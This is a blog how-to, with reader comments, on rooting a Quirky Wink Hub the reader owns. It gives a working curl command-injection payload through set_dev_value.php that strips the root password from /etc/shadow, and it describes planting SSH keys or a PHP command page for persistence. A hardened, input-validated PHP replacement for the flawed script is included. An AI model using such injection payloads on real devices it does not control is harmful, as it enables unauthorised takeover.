Rooting The Quirky Wink Hub

As you may know, the Quirky Wink Hub is an affordable home automation device containing the following radios: WiFi, Bluetooth, ZigBee, Z-Wave, Lutron, and Kidde. It is operated through the Wink app and connects through a cloud server. It is sold at Home Depot and Amazon.

Well, that’s good but what if we want to take matters into our own hands?  The device is a nice little Freescale i.MX283 based Linux box that we can have some fun with, especially with all the radio support.

Luckily, the enterprising crew at GTVHacker has discovered a nice exploit that makes rooting this hardware quite easy: http://dc22.gtvhacker.com/index.php/Wink_Hub%E2%80%8B%E2%80%8B

This is briefly discussed at:  http://hackaday.com/2014/08/09/defcon-22-hack-all-the-things/

Unfortunately this is patched in the most recent update.  The set_dev_value.php file has been removed.  So be sure to do this before you have connected the hub to the internet.

But what about a how-to?

Let’s get to it:

Plug in your Quirky Wink Hub and connect to the default WiFi AP that it creates.

Using cURL or similar, send the following command to the lighttpd server to remove the root password:

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;cp /etc/shadow /etc/shadow.bak;sed -i 's/root:.*:\(.*:.*:.*:.*:::\)/root::\1/' /etc/shadow;cat /etc/shadow;"

We should be able to access the shell now through the UART using a 3.3V TTL adapter.

If we don’t have the hardware to do that, there is another option. Dropbear runs on the device by default, so you can use the tftp command to bring over a replacement RSA key file for it, or use another cURL command to append your public RSA key to the /root/.ssh/authorized_keys file. Then you can access the device through SSH. Or you can create a new PHP file to preserve the shell command access through the web server.

Now that we have access to the device, we can see that there is a web interface available by default at /devices.php. This allows us to view and control the home automation devices linked to the hub. However, the control part does not work since a file has been removed. We can restore that function by editing the /var/www/set_dev_value.php file as follows:

$cmd = 'aprontest -u -m ' . $nodeId . ' -t ' . $attrId . ' -v ' . $v;

So we have a fully functional web interface to view and control the status of our connected devices.  We can use this as an API.
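The restored line places request values directly into a shell command string, which is what the cURL request at the top of this post relied on. A hardened form of the file, as an added example that is not the hub's original code: it assumes nodeId and attrId are decimal integers and that the value for $v arrives in a POST field named "value" (a hypothetical name).

```php
<?php
// Added example, not the hub's original set_dev_value.php.
// Assumptions: nodeId and attrId are decimal integers, the value for $v
// arrives in a POST field named "value" (hypothetical name), and values
// are short tokens such as ON, OFF or 255.

// Return $src[$name] only if the whole string matches $pattern;
// otherwise answer 400 and stop before any command is built.
function require_param($src, $name, $pattern)
{
    if (!isset($src[$name]) || !is_string($src[$name])
        || preg_match($pattern, $src[$name]) !== 1) {
        header('HTTP/1.1 400 Bad Request');
        header('Content-Type: text/plain');
        exit("invalid $name\n");
    }
    return $src[$name];
}

// \A and \z anchor the true start and end of input; "$" would also
// accept a trailing newline.
$nodeId = require_param($_POST, 'nodeId', '/\A[0-9]{1,5}\z/');
$attrId = require_param($_POST, 'attrId', '/\A[0-9]{1,5}\z/');
$v      = require_param($_POST, 'value', '/\A[A-Za-z0-9][A-Za-z0-9_.]{0,63}\z/');

// Allow-listing already excludes ";", quotes, spaces and "$".
// escapeshellarg() is kept as a second layer so each value stays a single
// shell word even if a pattern above is loosened later.
$cmd = 'aprontest -u -m ' . escapeshellarg($nodeId)
     . ' -t ' . escapeshellarg($attrId)
     . ' -v ' . escapeshellarg($v);

exec($cmd, $output, $status);
if ($status !== 0) {
    header('HTTP/1.1 500 Internal Server Error');
}
header('Content-Type: text/plain');
echo implode("\n", $output), "\n";
```

With this in place, the request shown earlier is answered with a 400 because its attrId is not numeric.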

To add devices, we can use the aprontest binary, which prints some nice help instructions when run with no arguments.

If we want to block the cloud connections and updates we can add the following entries to the hosts file:

127.0.0.1       hub-api.winkapp.com
127.0.0.1       hub-updates.winkapp.com
127.0.0.1       wink-hub-images.s3.amazonaws.com

Finally, we want to connect the hub as a client to our own WiFi network.  We can do so by POSTing the WiFi network information to the web server on the hub as follows:

curl "http://192.168.0.1/index.php" -d '{"ssid":"my_ssid","pass":"my_wifi_password"}'

As you can see the network parameters are just JSON encoded.

For some reason, these settings don’t seem to get saved to the database and persist through a reboot, possibly because we did not create a user account with a valid token. So we can do:

cp /database/wpa_supplicant.conf /etc/

Then we can edit the /etc/init.d/S41wireless file to reflect the new location of wpa_supplicant.conf.

If we have not created a Wink account, we can prevent these settings from being deleted by doing:

touch /database/oauth

No, apparently the oauth file gets deleted if it is invalid, so we need to edit /etc/init.d/S31platform to prevent it from deleting our wpa_supplicant.conf file.

Well, we should have a nice Quirky Wink Hub completely under our control now and ready to serve us faithfully without help from the cloud.


148 thoughts on “Rooting The Quirky Wink Hub”

  1. Has anybody successfully updated to the latest version of the hub firmware? I downloaded the firmware from https://wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi and followed all the manual update instructions, made sure getty was still being enabled and dropbear starting, etc, via uart. However once I hit reboot after writing the firmware I saw it apply yet another image during the first boot up. All of a sudden the serial console wasn’t accepting input, ssh wouldn’t let me login, but luckily I had put a php page in the new image that had cmd execution enabled and I was able to open /etc/inittab and saw the getty line was now commented out after I had checked previous to the reboot and confirmed it was uncommented. While it was connecting to wifi fine from the update image and after the first boot, once I rebooted it again the light went solid pink with no wifi connection at all and all I have now is uart access. It’s not bricked since I still have uart control, but hell if I know what went wrong with the update. When it boots it keeps saying “ubifs does not exist!” or something along those lines when it tries to attach /dev/mtd3 in one of the startup scripts. Anybody have any insight into this one?


    • rofl nevermind I figured out what I did…when I used the php page to echo the getty line back in to /etc/inittab I musta typed > instead of >> and it cleared out the file. Still, the fact that the files were updated again during the first boot to attempt to kill root access is worrying. Has anybody else seen this?


  2. Cool, about to get started. Can anyone confirm that I would leave the 3.3V floating at the wink PCB side when I want to install a serial connection?

    For the pogoplug, I rigged a Nokia CA-42 cable (has 3.3V level converter in it) to a 3.5mm headphone plug and on the other side rigged the serial connection to the corresponding headphone jack pins. I’d like to re-use the cable for the wink and install a headphone jack wired up to the GND/Tx/Rx pins of the wink. Only issue is the headphone jack I chose was TRS instead of TRRS and only has three connection points instead of four. This will work if I can indeed leave 3.3V on the wink disconnected. Can anyone confirm?


  3. Is the processor powerful enough to run openHAB or homegenie? Seems it would be a great buy if you could. Otherwise my $20 is better spent buying a USB Zwave controller than messing with this.


  4. Hi, I was able to root the hub and put it on my home network. I can ssh into the hub as well. However, I was not able to add it to the wink android application. How am I supposed to control the hub now?


  5. What is the most recent version of f/w that can be exploited? Before discovering this site, I updated my Wink hubs, one to 00.56, the other to 00.55. Thx!


  6. Unfortunately I happened upon all of this after I had already upgraded to the latest firmware (0.56). Is there any way I can root or am I out of luck?


  7. Looks like a WM10134CT-ND vertical molex micro usb connector would fit nicely in J8.

    Has anyone been able to use something like imx_usb_loader to rescue an accidentally updated hub?


  8. anyone got zapped with the latest firmware and had it die? I currently have a new-in-box Wink and I was thinking of rooting it before bringing online (to the net). The latest firmware was zapped with an expired SSL cert and it got me thinking if I have an old version, will the expired cert block me from using the exploit (for rooting)?


    • I didn’t have any issue updating with the old cert. If you check XDA forums, someone attached the new cert in case of trouble.

      On Mon, Apr 20, 2015, 3:09 PM winkhubroot wrote:

      > Roland Gallinera commented: “anyone got zapped with the latest firmware and had it die? I currently have a new-in-box Wink and I was thinking of rooting it before bringing online (to the net). The latest firmware was zapped with an expired SSL cert and it got me thinking if I have an”

